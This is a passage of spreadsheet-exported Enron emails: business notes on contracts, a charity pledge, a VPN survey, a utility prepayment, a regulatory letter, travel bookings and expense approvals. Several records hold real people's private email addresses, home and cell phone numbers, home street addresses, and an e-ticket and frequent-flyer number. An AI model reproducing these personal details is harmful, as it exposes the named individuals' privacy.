_x000D_
</t>
  </si>
  <si>
    <t>Wed, 27 Sep 2000 14:20:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'boardwalk@iquest.net', 'wthom25746@aol.com', 'kstewart@ctcua.org', 'pastorhess@hotmail.com', 'jawallace12050@aol.com', 'mbaddour@msn.com', 'williamhjordan@mindspring.com', 'bensons3@airmail.net', 'pwm1950@aol.com', 'hbrunette@earthlink.net', 'wgander@twa.com', 'jglass@mmind.net', 'harris@wheelerads.com', 'bwall@copcp.com', 'hosman@eskridge.net', 'judgegyro@yahoo.com', 'chuck.paul@a-closer-look.com', 'jansson@mindspring.com', 'azaremba@fzci.net', 'dfullert@nmh.org', 'jowen9653@aol.com', 'akinpa@email.msn.com', 'golfnbud@aol.com', 'jdent@mmcable.com', 'jstorthz@flash.net', 'handshohl@eudoramail.com', 'hosman@flash.net', 'samuraimai@aol.com', 'hutchathoh@aol.com', 'john_grumbles@berryplastics.com', 'shackleton@worldnet.att.net', 'jepetree@bellsouth.net', 'rrossell@angiodynamics.com', 'jimfulrich@aol.com', 'kcason@flash.net', 'craigd9561@aol.com', 'jskilli@enron.com', 'sogborn@goiac.com', 'johnmiller@advlaser.com', 'boethia@hotmail.com', 'rharman@bass-associates.com', 'markpa@gateway.net', 'ccoburn@themissionbank.com', 'froby@holmesmurphy.com', 'leland.white@energyspectrum.com', 'christop@netcomuk.co.uk'})</t>
  </si>
  <si>
    <t>correction</t>
  </si>
  <si>
    <t>Bros.,_x000D_
It is true that Clay is coming, but the NEW addition to  the list is ROB _x000D_
ROSSELL._x000D_
BEEK</t>
  </si>
  <si>
    <t>Tue, 9 Jan 2001 03:20:00 -0800 (PST)</t>
  </si>
  <si>
    <t>BVP Interconnect Agreement</t>
  </si>
  <si>
    <t>Greg,_x000D_
_x000D_
Attached for your review and further handling is the Brazos Valley Project, _x000D_
L.P. Interconnect Agreement which incorporates the changes we discussed this _x000D_
morning._x000D_
_x000D_
_x000D_
_x000D_
Thanks,_x000D_
_x000D_
Eric Gillaspie_x000D_
713-345-7667_x000D_
Enron Building 3886</t>
  </si>
  <si>
    <t>Tue, 24 Apr 2001 13:39:51 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'cbreaux@ncsc.dni.us'})</t>
  </si>
  <si>
    <t>May 16 Meeting in Washington, D. C.</t>
  </si>
  <si>
    <t xml:space="preserve">Cyndy, I am in receipt of Bill Ide's letter inviting me to the May 16 meeting at the Willard Hotel in Washington, D.C.  Because the May 16 neeting conflicts directly with an obligation to which I am committed, I will not be able to attend.  Please keep me in mind for future events.  Thank you.  Jim Derrick (ENRON). </t>
  </si>
  <si>
    <t>Fri, 16 Feb 2001 02:15:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'andrew_m_ozuna@mail.bankone.com'})</t>
  </si>
  <si>
    <t>Andrew,_x000D_
_x000D_
Here is an asset statement.  I will mail my 98 &amp; 99 Tax returns plus a 2000 _x000D_
W2.  Is this sufficient?_x000D_
_x000D_
_x000D_
_x000D_
Phillip Allen_x000D_
713-853-7041 wk_x000D_
713-463-8626 home</t>
  </si>
  <si>
    <t>Mon, 4 Dec 2000 02:35:00 -0800 (PST)</t>
  </si>
  <si>
    <t xml:space="preserve">I'll be in South Dakota from the 28th of December through the 3d of January.  _x000D_
While there, I can be reached via my voice mail, which I will check daily, or _x000D_
through my cell phone at 402-630-8461.  At all other times, I will be Omaha _x000D_
and reachable at my office number, cell phone or home number of _x000D_
402-572-8595.  Thanks.  DF </t>
  </si>
  <si>
    <t>Tue, 8 May 2001 09:42:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'les.webber@enron.com', 'phil.demoes@enron.com'})</t>
  </si>
  <si>
    <t>Re: SOUTHERN</t>
  </si>
  <si>
    <t>Please review the attached document to see if it reflects the matters we _x000D_
discussed.  I continued Les's marking and added some red-line changes and _x000D_
removed some of Les's language which no longer applied.  It will take more _x000D_
than an simple accept all changes to get to a clean copy.  Let me know if you _x000D_
need a clean copy so that I can clean up the different colors and methods of _x000D_
showing changes.</t>
  </si>
  <si>
    <t>Fri, 20 Apr 2001 18:07:00 -0700 (PDT)</t>
  </si>
  <si>
    <t xml:space="preserve">I'll give 150._x000D_
_x000D_
_x000D_
   _x000D_
_x000D_
	Enron Capital &amp; Trade Resources Corp.  From:  Jeff Skilling                           04/19/2001 05:18 PM	_x000D_
		_x000D_
_x000D_
_x000D_
Sent by:	Sherri Sera_x000D_
To:	Cliff Baxter/HOU/ECT@ECT, Rick Buy/HOU/ECT, Ben Glisan/HOU/ECT@ECT, Steven J Kean/NA/Enron@Enron, Jeffrey Sherrick/Corp/Enron, Philippe A Bibi/HOU/ECT, Michael Brown/NA/Enron, Wade Cline/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, James A Hughes/ENRON_DEVELOPMENT, Louise Kitchen/HOU/ECT@ECT, Rebecca McDonald/ENRON_DEVELOPMENT, Greg Piper/Corp/Enron, John Sherriff/LON/ECT@ECT, Greg Whalley/HOU/ECT@ECT, Janet R Dietrich/HOU/EES@EES, Mark S Muller/HOU/EES@EES, Matthew Scrimshaw/LON/ECT@ECT, David Cox/Enron Communications@Enron Communications, Kevin Hannon/Enron Communications@Enron Communications, Rod Hayslett/FGT/Enron, Stan Horton/Houston/Eott@Eott, Danny McCarty/ET&amp;S/Enron@Enron_x000D_
cc:	 _x000D_
_x000D_
Subject:	_x000D_
_x000D_
I know how incredibly busy you all are, so I'm sure that making a pledge to Jeff for the MS150 has simply slipped your mind.  Well the ride is this weekend, time is running out and we need you!_x000D_
_x000D_
Enron's goal is to raise $700,000, and Jeff's personal goal is to raise $50,000.  As of today, we are a little better than half way there.  Won't you consider helping him reach his goal?_x000D_
_x000D_
Thanks for your consideration.  I look forward to hearing from you tomorrow..._x000D_
_x000D_
Sherri :-)_x000D_
</t>
  </si>
  <si>
    <t>Mon, 23 Apr 2001 02:42:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Start Date: 4/23/01; HourAhead hour: 10;  &lt;CODESITE&gt;</t>
  </si>
  <si>
    <t>Start Date: 4/23/01; HourAhead hour: 10;  No ancillary schedules awarded.  No _x000D_
variances detected._x000D_
_x000D_
    LOG MESSAGES:_x000D_
_x000D_
PARSING FILE --&gt;&gt; O:\Portland\WestDesk\California Scheduling\ISO Final _x000D_
Schedules\2001042310.txt</t>
  </si>
  <si>
    <t>Mon, 9 Oct 2000 02:09:00 -0700 (PDT)</t>
  </si>
  <si>
    <t xml:space="preserve">Hey, not so fast...  I did try to retrieve that info from the site prior to _x000D_
the call but had no luck finding it.  Most of what I could find on their site _x000D_
dated back to 1999.  Any other ideas?_x000D_
_x000D_
Mike_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
From: Jeff Dasovich@ENRON on 10/09/2000 10:52 AM CDT_x000D_
Sent by: Jeff Dasovich@ENRON_x000D_
To: Michael Etringer/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: _x000D_
_x000D_
Greetings:  How's things?  Got your message.  Best place to get your hands on _x000D_
the report is the CalPX website.  If you have any problems, let me know.  _x000D_
I'll try to write a note discussing our conversation on Friday by end of day._x000D_
_x000D_
Best,_x000D_
Jeff_x000D_
</t>
  </si>
  <si>
    <t>Fri, 14 Dec 2001 14:16:56 -0800 (PST)</t>
  </si>
  <si>
    <t>5822 Center Court Drive_x000D_
Spring, Texas  77379_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Edison, Andrew  _x000D_
Sent:	Friday, December 14, 2001 3:38 PM_x000D_
To:	Hodge, Jeffrey T._x000D_
Subject:	_x000D_
_x000D_
what is your home address?</t>
  </si>
  <si>
    <t xml:space="preserve">  &lt;http://isc.dev.corp.enron.com/surveyVPN/images/index_r1_c1_r1_c1.gif&gt;	 	_x000D_
Now that you have access to the following applications without requiring VPN access..._x000D_
_x000D_
_x000D_
_x000D_
Outlook Web Access (email and calendar)_x000D_
_x000D_
PEP_x000D_
_x000D_
XMS (Expense Reporting application)_x000D_
_x000D_
And, COMING SOON..._x000D_
eHROnline (year-end)_x000D_
Benefits Election (Oct. 29, 2001)_x000D_
Electronic Pay Stubs (year-end), and_x000D_
Much More,_x000D_
_x000D_
through the ClickAtHome Portal and the Internet, do you still believe you need remote access through VPN from home to Enron networks (must have a valid business reason with supervisor approval and a monthly cost)?_x000D_
_x000D_
 YES NO NOT SURE_x000D_
Please answer this survey from your computer at work, not via Outlook Web Access._x000D_
</t>
  </si>
  <si>
    <t>Fri, 7 Jul 2000 02:53:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'janice.moore@enron.com', 'shari.stack@enron.com', 'christian.yoder@enron.com', 'janet.moore@enron.com', 'elizabeth.sager@enron.com', 'genia.fitzgerald@enron.com', 'jeffrey.hodge@enron.com', 'leslie.hansen@enron.com'})</t>
  </si>
  <si>
    <t>Power industry website list</t>
  </si>
  <si>
    <t>Attached is a directory of websites that I find valuable, in case you were _x000D_
not previously aware of it.  _x000D_
_x000D_
http://www.dei.gr/main/utility.htm</t>
  </si>
  <si>
    <t>Fri, 15 Sep 2000 09:12:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'cneal@bluegate.com'})</t>
  </si>
  <si>
    <t>frozenset({'ericn@thisco.com', 'chrisn@thisco.com', 'billnealmd@hotmail.com', 'sneal@enron.com', 'muddywaters@hubserv.com', 'todd.neal@chron.com'})</t>
  </si>
  <si>
    <t>Just wanted to let everyone know I started a new job last Friday:_x000D_
    Pipeline Power Partners_x000D_
    10000 Memorial Drive, Suite 200_x000D_
    Houston, Texas 77024_x000D_
    713-290-8762_x000D_
I'm back working on compressor stations and gas storage projects with some_x000D_
of the guys I worked with on the Columbia Gas Compressor station in '93-'94._x000D_
Note new email address also._x000D_
_x000D_
Barry called me last week about the well pump. It was not working and he had_x000D_
tried everything he knew to do. We decided to call Western Water Well_x000D_
Service in Conroe to check it out. Bottom line-it was beyond repair and we_x000D_
had to replace at a cost of $765.52. When our tenant at the time took it_x000D_
upon himself to dig a new well ($1500) he had them put in a real cheap_x000D_
pump-so that's why it went out in a relatively short period of time. We now_x000D_
have only $90 in the account so everyone needs to think about making a_x000D_
contribution sometime soon. If you have a question, please call._x000D_
_x000D_
Conrad_x000D_
_x000D_
 - winmail.dat</t>
  </si>
  <si>
    <t>Tue, 31 Aug 1999 03:30:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Norwegian Contracts</t>
  </si>
  <si>
    <t xml:space="preserve">Scott,_x000D_
_x000D_
Can you pass on Mary Solmonson's memo to the appropriate London lawyer _x000D_
responsible for Norway power contracts.  Mary is the head of Global Contracts _x000D_
here in Houston, and Phillipe Travis works for Mary, and just went over to _x000D_
London to work on getting systems in place for Global Contracts in London._x000D_
_x000D_
Thanks for your help!_x000D_
---------------------- Forwarded by Tana Jones/HOU/ECT on 08/31/99 10:25 AM _x000D_
---------------------------_x000D_
_x000D_
_x000D_
Mary Solmonson_x000D_
08/31/99 09:44 AM_x000D_
To: Tana Jones/HOU/ECT@ECT_x000D_
cc: Mark - ECT Legal Taylor/HOU/ECT@ECT _x000D_
Subject: Norwegian Contracts_x000D_
_x000D_
Philippe has uncovered a group of contracts in Norwegian that are not _x000D_
translated in English at all.  Here is his note :_x000D_
_x000D_
Norwegian Power Contracts have not been translated into English.  This has _x000D_
not been an issue for the Power Deal Clearing and Documentation Group because _x000D_
Ellen Wallumrod is from Norway.  She is able to make 'confirms' in her native _x000D_
tongue.  However, this is an issue from Global Contracts because no one can _x000D_
speak Norwegian! _x000D_
I have spoken with translation companies regarding translation fees.  It is _x000D_
very costly to have all of the contracts translated.  There are perhaps a _x000D_
dozen contracts.  Should legal cover the translation expenses?  Ian believes _x000D_
that only parts of the contract need to be translated.  But, how do I know _x000D_
which parts need to be translated?  And, with Auditors in mind, shouldn't we _x000D_
have English copies on hand?_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Do we need to have a complete English version ?_x000D_
_x000D_
If not, would it be acceptable to translate only certain paragraphs ?_x000D_
_x000D_
Should we (Global Contracts) target building a multi-lingual staff for the _x000D_
future - esp. in London office ?_x000D_
_x000D_
Got any ideas or opinions ?_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 31 Jul 2001 07:43:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Sen. Dunn</t>
  </si>
  <si>
    <t>Really appreciate it.  Thanks so much.</t>
  </si>
  <si>
    <t>Tue, 27 Feb 2001 08:10:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'dianne.seib@enron.com', 'peggy.hedstrom@enron.com'})</t>
  </si>
  <si>
    <t>Tana's Itinerary</t>
  </si>
  <si>
    <t>Dianne, Peggy - Peter and Greg are having a call with Tana Jones tomorrow _x000D_
morning at 10:30 a.m. to discuss Tana's agenda for her trip here in March.  _x000D_
If you are able to participate in the call, please join them in Peter's _x000D_
office._x000D_
_x000D_
Thanks,_x000D_
Sharon</t>
  </si>
  <si>
    <t>Thu, 27 Dec 2001 07:02:12 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'rick.dietz@enron.com', 'richard.hanagriff@enron.com', 'a..howard@enron.com', 'jerry.peters@enron.com', 'kimberly.watson@enron.com', 'steven.harris@enron.com', 'michelle.lokay@enron.com', 'rod.hayslett@enron.com'})</t>
  </si>
  <si>
    <t>FW: PG &amp; E Prepayment December 26.</t>
  </si>
  <si>
    <t>Please be advised that the prepayment of $ 1,773,000 for the January transportation was received December 26._x000D_
_x000D_
Regards._x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Cherry, Paul  _x000D_
Sent:	Friday, December 21, 2001 11:57 AM_x000D_
To:	Howard, Kevin A.; Peters, Jerry; Hayslett, Rod_x000D_
Subject:	PG &amp; E Prepayment December 26._x000D_
_x000D_
FYI_x000D_
_x000D_
I received a voice mail from Jack Foley at PG &amp;E wanting to breakup the prepayment ($ 1,700,000 ) due December 26 into four weekly installments. My response is to reject that request and walk him through TW with the most current information. This would be similar to what Kevin did with two vendors this morning, Nuovo Pignone and LaBarge Steel._x000D_
_x000D_
Regards.</t>
  </si>
  <si>
    <t>Thu, 25 Jan 2001 06:58:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Did you ever talk to John Klauberg? I never heard back from his_x000D_
 assistant.</t>
  </si>
  <si>
    <t>I called him.</t>
  </si>
  <si>
    <t>Mon, 16 Jul 2001 12:34:29 -0700 (PDT)</t>
  </si>
  <si>
    <t>Mark, we are trying to get some information on the Nymex Access Electronic Trading System. It is our understanding that during the day the electronic trading system cannot be used because all prices must be announced on the Trading floor so all members are aware of the prices at the same time. However, Nymex wants to use the Access system to post prices after trading hours. Does EnronOnline have any legal obstacles to overcome if we want to post our prices on Access and/or Nymex post their prices on EnronOnline? Thank you in advance for your assistance._x000D_
_x000D_
Justin Rostant_x000D_
EnronOnline LLC._x000D_
Phone: 713-853-6460_x000D_
Mobile: 832-264-6333_x000D_
Fax: 713-646-2126</t>
  </si>
  <si>
    <t>Fri, 8 Dec 2000 06:59:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'sscott3@enron.com', 'phildavies@aec.ca', 'rick.counihan@greenmountain.com', 'bdingwall@unitedgas.com', 'gworster@txuenergy.com', 'paulamirault@aec.ca', 'zangeles@sempra.com', 'jfawcett@enron.com', 'rochmanm@spurr.org', 'porterdk@sce.com', 'kmccrea@sablaw.com', 'chj@aelaw.com', 'burkee@cts.com', 'cushnice@sce.com', '6266273191@messaging.sprintpcs.com', 'rmp@cpuc.ca.gov', 'alexanms@sce.com', 'johnson_pamela@lacoe.edu', 'gwright@sempra.com', 'counihan@greenmountain.com', 'craigc@calpine.com', 'lindseyhowdowning@dwt.com', 'jleslie@luce.com', 'jdasovic@enron.com', 'jeff.dasovich@enron.com', 'karpjos@sf.whitecase.com', 'mday@gmssr.com', 'gsullivan@sempra.com', 'eke@aelaw.com', 'david.bayless@utility.com'})</t>
  </si>
  <si>
    <t>Re: Revised Draft of letter</t>
  </si>
  <si>
    <t>Letter looks great -- I am in the process of getting Watson's OK to sign on._x000D_
Due to all the emergencies this week, Watson is focusing its comments on the_x000D_
Bilas PD on the PG&amp;E city-gate price issue (I certainly feel duty-bound to_x000D_
defend my numbers and analysis!).  Here is a draft, if anyone has time to_x000D_
review it._x000D_
_x000D_
Tom_x000D_
_x000D_
----- Original Message -----_x000D_
From: MBD &lt;MDay@GMSSR.com&gt;_x000D_
To: 'Pocta, Robert M.' &lt;rmp@cpuc.ca.gov&gt;; 'Counihan, Rick'_x000D_
&lt;rick.counihan@greenmountain.com&gt;; &lt;Jeff.Dasovich@enron.com&gt;; 'John_x000D_
Burkholder' &lt;burkee@cts.com&gt;; 'Mike Alexander' &lt;alexanms@sce.com&gt;; 'Craig_x000D_
Chancellor' &lt;craigc@calpine.com&gt;; 'Colin Cushnie' &lt;cushnice@sce.com&gt;; 'Jeff_x000D_
Dasovich' &lt;jdasovic@enron.com&gt;; MBD &lt;MDay@GMSSR.com&gt;; 'Paul Amirault'_x000D_
&lt;PaulAmirault@aec.ca&gt;; 'Doug Porter' &lt;porterdk@sce.com&gt;; 'Tom Beach'_x000D_
&lt;tomb@crossborderenergy.com&gt;; 'Amirault, Paul' &lt;PaulAmirault@aec.ca&gt;; 'Craig_x000D_
Chancellor, Calpine' &lt;craigc@calpine.com&gt;; 'How-Downing, Lindsey'_x000D_
&lt;Lindseyhowdowning@dwt.com&gt;; 'Phil Davies, WGSI Calgary'_x000D_
&lt;PhilDavies@aec.ca&gt;; &lt;jleslie@LUCE.com&gt;; 'Jeff Fawcett, Transwestern'_x000D_
&lt;jfawcett@enron.com&gt;; 'Michael Rochman' &lt;rochmanm@spurr.org&gt;; 'Rick_x000D_
Counihan, Greenmountain.com' &lt;counihan@greenmountain.com&gt;; 'Bayless,_x000D_
David@Utility' &lt;david.bayless@utility.com&gt;; 'Dingwall, Brian@UEM' &amp;_x000D_
Sent: Friday, December 08, 2000 2:37 PM_x000D_
Subject: Revised Draft of letter_x000D_
_x000D_
_x000D_
&gt; Here is the revised draft of the letter to the Commission regarding the_x000D_
PD._x000D_
&gt; Please comment ASAP.  We would like specific authorizations from each_x000D_
party_x000D_
&gt; to include their name on the letter, which will be delivered by Mike Day_x000D_
to_x000D_
&gt; each Commissioner and distributed to the press.  If you have edits to_x000D_
&gt; propose.  Please proposed them in a "reply all" note so that everyone on_x000D_
&gt; this list can react to the changes.  Please respond as soon as possible,_x000D_
&gt; hopefully by the close of business today.  If you believe you can get_x000D_
&gt; approval to sign the letter by Monday morning, please advise us of that_x000D_
fact_x000D_
&gt; as well and we will wait for you.  Thank you all for your prompt_x000D_
&gt; consideration of this matter.  Mike Day_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;  &lt;&lt;X19029.DOC&gt;&gt;_x000D_
&gt;_x000D_
_x000D_
 - Comments on the Bilas PD in the Gas OIR.wpd</t>
  </si>
  <si>
    <t>Fri, 12 Jan 2001 03:43:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'lkontos@swbell.net'})</t>
  </si>
  <si>
    <t xml:space="preserve">What's Bobbie's last name?_x000D_
_x000D_
_x000D_
_x000D_
	Lucinda Kontos &lt;lkontos@swbell.net&gt;_x000D_
	01/12/2001 10:21 AM_x000D_
		 _x000D_
		 To: TANA.JONES@ENRON.COM_x000D_
		 cc: _x000D_
		 Subject: _x000D_
_x000D_
_x000D_
_x000D_
Tana,_x000D_
Here is Bobbie's address:_x000D_
2223 Goldsmith_x000D_
Houston, TX??? 77030_x000D_
?_x000D_
Thanks so much for doing this.? _x000D_
Lucinda_x000D_
?_x000D_
</t>
  </si>
  <si>
    <t>Thu, 26 Oct 2000 07:26:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'susan.trevino@enron.com', 'burton.mcintyre@enron.com'})</t>
  </si>
  <si>
    <t>Book Request</t>
  </si>
  <si>
    <t xml:space="preserve">This book is for the West desk.  Please call if you have any questions._x000D_
</t>
  </si>
  <si>
    <t>Thu, 7 Sep 2000 15:50:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Second Round classes</t>
  </si>
  <si>
    <t>Evening MBA Students:_x000D_
_x000D_
This evening we contacted the students who got into the classes they_x000D_
requested.  This was the SECOND ROUND._x000D_
_x000D_
If you were not contacted, we will continue to look at add/drops as they_x000D_
are submitted._x000D_
_x000D_
Thanks and see you,_x000D_
TJ</t>
  </si>
  <si>
    <t>Mon, 9 Oct 2000 08:34:00 -0700 (PDT)</t>
  </si>
  <si>
    <t xml:space="preserve">Do you know this guy?  I can't place him._x000D_
---------------------- Forwarded by Susan J Mara/SFO/EES on 10/09/2000 01:30 _x000D_
PM ---------------------------_x000D_
_x000D_
_x000D_
Jeff Shields@ECT_x000D_
10/09/2000 09:51 AM_x000D_
To: Jeff Dasovich/NA/Enron@ENRON_x000D_
cc: Michael McDonald/SF/ECT@ECT, Laird Dyer/SF/ECT@ECT, Mona L _x000D_
Petrochko/SFO/EES@EES, Paul Kaufman/PDX/ECT@ECT, Susan J Mara/SFO/EES@EES _x000D_
Subject: Re: [Fwd: CMUA Market Reform proposal]  _x000D_
_x000D_
The problem is not "deregulation." The fact is Oregon is not deregulated yet _x000D_
and rates are going through the roof. Also, one only needs to look back to _x000D_
1980-85 when rates in the Northwest went up 250% over a five year period _x000D_
because of nukes. This occurred in a fully regulated environment. _x000D_
_x000D_
The problem is that many consumers do not have a true choice to secure a _x000D_
fixed price long-term contract. _x000D_
_x000D_
You can not put the toothpaste back into the tube!  _x000D_
_x000D_
I hope Enron takes the high road on this issue and pushes for expedited _x000D_
siting of new generation. The best way to accomplish this is to agree to _x000D_
compliance with emissions standards and meeting off-sets where they exist. _x000D_
Where off-sets do not exist, I think Enron can commit to paying for energy _x000D_
efficiency investments in partnership with utilities or industrial customers _x000D_
that take the out-put (or take equity) at our new plants. _x000D_
_x000D_
Paying for conservation, which is running about 19-22 mills in the Northwest, _x000D_
is a pretty inexpensive way to accomplish good will with end-users and _x000D_
utilities._x000D_
</t>
  </si>
  <si>
    <t>Fri, 1 Jun 2001 09:49:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'nmann@erac.com', 'suzanne.adams@enron.com', 'kay.mann@worldnet.att.net'})</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Kay Mann/Corp/Enron on 06/01/2001 04:49 _x000D_
PM ---------------------------_x000D_
_x000D_
_x000D_
VIKKI ANAYA &lt;vanaya_vitoltvl@yahoo.com&gt; on 06/01/2001 04:45:30 PM_x000D_
To: KAY.MANN@ENRON.COM_x000D_
cc:  _x000D_
_x000D_
Subject: _x000D_
_x000D_
                                          AGENT VA/VA BOOKING REF_x000D_
YZEY2A_x000D_
 _x000D_
                                          MANN/C KAY_x000D_
 _x000D_
 _x000D_
  ENRON_x000D_
  1400 SMITH_x000D_
  HOUSTON TX 77002_x000D_
  ATTN KAY MANN X 57566_x000D_
 _x000D_
 _x000D_
  DATE:  JUN 01 2001_x000D_
 _x000D_
SERVICE               DATE  FROM           TO             DEPART _x000D_
ARRIVE_x000D_
 _x000D_
CONTINENTAL AIRLINES  04JUN HOUSTON TX     MEMPHIS TN     745A    930A_x000D_
CO 4096    Y          MON   G.BUSH INTERCO MEMPHIS INTL_x000D_
                            TERMINAL B_x000D_
                            SNACK                         NON STOP_x000D_
                            RESERVATION CONFIRMED         1:45 DURATION_x000D_
                            FLIGHT OPERATED BY CONTINENTAL EXPRESS_x000D_
                  AIRCRAFT: EMBRAER EMB 145_x000D_
                            SEAT 11C NO SMOKING CONFIRMED MANN/C KAY_x000D_
 _x000D_
CONTINENTAL AIRLINES  04JUN MEMPHIS TN     HOUSTON TX     555P    740P_x000D_
CO 3841    Y          MON   MEMPHIS INTL   G.BUSH INTERCO_x000D_
                                           TERMINAL B_x000D_
                                                          NON STOP_x000D_
                            RESERVATION CONFIRMED         1:45 DURATION_x000D_
                            FLIGHT OPERATED BY CONTINENTAL EXPRESS_x000D_
                  AIRCRAFT: EMBRAER EMB 145_x000D_
                            SEAT 12C NO SMOKING CONFIRMED MANN/C KAY_x000D_
 _x000D_
RESERVATION NUMBER(S)  CO/JR33G1_x000D_
 _x000D_
MANN/C KAY                               TICKET:CO/ETKT 005 7029446540_x000D_
 _x000D_
CO  FREQUENT FLYER COHG770475_x000D_
***********************************************_x000D_
THIS IS A TICKETLESS RESERVATION. PLEASE HAVE A_x000D_
PICTURE ID AVAILABLE AT THE AIRPORT. THANK YOU_x000D_
***********************************************_x000D_
                  THANK YOU FOR CALLING VITOL TRAVEL_x000D_
_x000D_
_x000D_
___________________________________________________x000D_
Do You Yahoo!?_x000D_
Get personalized email addresses from Yahoo! Mail - only $35 _x000D_
a year!  http://personal.mail.yahoo.com/_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 12 Apr 2001 08:14:42 -0700 (PDT)</t>
  </si>
  <si>
    <t>Your Message</t>
  </si>
  <si>
    <t>Bill, I want to thank you and your team for everything you are doing to assist our cause.  I am confident that, together, we shall ultimately prevail.  Good luck on the appeal.  All the best.  Jim</t>
  </si>
  <si>
    <t>Thu, 30 Nov 2000 00:13:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'robert.walker@enron.com'})</t>
  </si>
  <si>
    <t>D&amp;P/Lynx Pricing Issues</t>
  </si>
  <si>
    <t xml:space="preserve">Richard,_x000D_
I left you a message about this issue on Tuesday.  I really need your input _x000D_
before we make the payments to Lynx.  Could we meet today sometime or talk on _x000D_
the phone?_x000D_
_x000D_
Thanks,_x000D_
_x000D_
BOb.----- Forwarded by Robert Walker/HOU/ECT on 11/30/2000 08:12 AM -----_x000D_
_x000D_
	Cynthia Hakemack_x000D_
	11/28/2000 08:39 AM_x000D_
		 _x000D_
		 To: Julie Meyers/HOU/ECT@ECT_x000D_
		 cc: Robert Walker/HOU/ECT@ECT, Melissa Graves/HOU/ECT@ECT_x000D_
		 Subject: D&amp;P/Lynx Pricing Issues_x000D_
_x000D_
Julie,  I'm working with Legal and Bob Surles with Lynx Energy Company on _x000D_
some pricing issues regarding meter 6677.  I have verified with Bob Fischer _x000D_
in the Transport Group the transportation rates that HPLC is paying to Gulf _x000D_
Coast Pipeline Company, which in turn must be paid to HPLC by Lynx Energy.   _x000D_
Would you please change Sitara to reflect the transportation rates shown on _x000D_
the schedule below?  Also, I've recalculated the average price and need you _x000D_
to make those changes too. Thanks._x000D_
_x000D_
Sitara Period Transport Rate Price_x000D_
84425 07/99 $.10 $2.1847776 _x000D_
84425 08/99 $.10 $2.4957319_x000D_
84425 09/99 $.10 $2.7938893_x000D_
84425 10/99 $.10 $2.4148763_x000D_
84425 11/99 $.10 $2.8992412_x000D_
128331 12/99-02/00 $.10 HSC less $.10_x000D_
166026 02/00-03/00 $.10 HSC less $.10_x000D_
166026 04/00-fwd $.20 HSC less $.10_x000D_
 _x000D_
</t>
  </si>
  <si>
    <t>Sun, 28 Jan 2001 12:54:00 -0800 (PST)</t>
  </si>
  <si>
    <t xml:space="preserve">have you handled already?_x000D_
----- Forwarded by Steven J Kean/NA/Enron on 01/28/2001 08:54 PM -----_x000D_
_x000D_
	Expense Server@Enron_Development_x000D_
	01/02/2001 01:28 PM_x000D_
		 _x000D_
		 To: Steven J Kean/NA/Enron@Enron_x000D_
		 cc: _x000D_
		 Subject: &lt;&lt;Concur Expense Document&gt;&gt; - General Expenses_x000D_
_x000D_
The following expense report is ready for approval:_x000D_
_x000D_
Employee Name: John Hardy Jr Jr._x000D_
Status last changed by:  Automated Administrator_x000D_
Expense Report Name: General Expenses_x000D_
Report Total: $5,239.11_x000D_
Amount Due Employee: $346.02_x000D_
_x000D_
_x000D_
To approve this expense report, click on the following link for Concur _x000D_
Expense._x000D_
http://nahou-wwxms01p_x000D_
_x000D_
_x000D_
----- Forwarded by Steven J Kean/NA/Enron on 01/28/2001 08:54 PM -----_x000D_
_x000D_
	Expense Server@Enron_Development_x000D_
	01/12/2001 04:15 PM_x000D_
		 _x000D_
		 To: Steven J Kean/NA/Enron@Enron_x000D_
		 cc: _x000D_
		 Subject: &lt;&lt;Concur Expense Document&gt;&gt; - Dec - 2000_x000D_
_x000D_
The following expense report is ready for approval:_x000D_
_x000D_
Employee Name: Mark A. Palmer_x000D_
Status last changed by:  Automated Administrator_x000D_
Expense Report Name: Dec - 2000_x000D_
Report Total: $8,581.93_x000D_
Amount Due Employee: $3,367.90_x000D_
_x000D_
_x000D_
To approve this expense report, click on the following link for Concur _x000D_
Expense._x000D_
http://nahou-wwxms01p_x000D_
_x000D_
_x000D_
----- Forwarded by Steven J Kean/NA/Enron on 01/28/2001 08:54 PM -----_x000D_
_x000D_
	Expense Server@Enron_Development_x000D_
	01/12/2001 04:46 PM_x000D_
		 _x000D_
		 To: Steven J Kean/NA/Enron@Enron_x000D_
		 cc: _x000D_
		 Subject: &lt;&lt;Concur Expense Document&gt;&gt; - Dec - 2000_x000D_
_x000D_
The following expense report is ready for approval:_x000D_
_x000D_
Employee Name: Mark A. Palmer_x000D_
Status last changed by:  Automated Administrator_x000D_
Expense Report Name: Dec - 2000_x000D_
Report Total: $8,581.93_x000D_
Amount Due Employee: $8,581.93_x000D_
_x000D_
_x000D_
To approve this expense report, click on the following link for Concur _x000D_
Expense._x000D_
http://nahou-wwxms01p_x000D_
_x000D_
_x000D_
----- Forwarded by Steven J Kean/NA/Enron on 01/28/2001 08:54 PM -----_x000D_
_x000D_
	Expense Server@Enron_Development_x000D_
	01/18/2001 02:51 PM_x000D_
		 _x000D_
		 To: Steven J Kean/NA/Enron@Enron_x000D_
		 cc: _x000D_
